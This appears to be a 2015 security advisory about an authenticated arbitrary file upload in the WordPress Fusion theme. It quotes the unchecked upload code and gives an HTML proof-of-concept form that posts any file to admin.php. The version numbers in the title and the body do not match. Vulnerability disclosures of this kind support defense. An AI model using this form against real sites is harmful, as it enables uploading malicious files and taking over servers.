WordPress Fusion 1.9.1 Arbitrary File Upload

2015.02.14
Credit: Evex
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

------------------------------------------------------------------------------ WordPress Fusion Theme Authenicated Arbitrary File Upload ------------------------------------------------------------------------------ [-] Theme Link: https://wordpress.org/themes/fusion ( Over 334,000 Downloads ) http://digitalnature.ro/themes/fusion/ [-] Affected Version: Version 3.1 [-] Vulnerability Description: The vulnerable code is located in the /functions script: //SHORTENED CODE function fusion_options() { if ( 'fusion_save' == $_REQUEST['action'] ) { if ($_FILES["file-logo"]["type"]){ $directory = $uploadpath['basedir'].'/'; move_uploaded_file($_FILES["file-logo"]["tmp_name"], $directory . $_FILES["file-logo"]["name"]); update_option('fusion_logoimage', $uploadpath['baseurl']. "/". $_FILES["file-logo"]["name"]); } } add_action('admin_menu', 'fusion_options'); then function fusion_options can be called by LOGGED IN USERS and executed which leads to uploading any file on attacked server which may cause the site full take over. [-] Proof of Concept: <form action="http://localhost/x/wordpress/wp-admin/admin.php" method="post" enctype="multipart/form-data"> <input type="file" name="file-logo" /> <input type="hidden" name="action" value="fusion_save" /> <button type="submit" >Upload</button> </form>

References:

http://digitalnature.ro/themes/fusion/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top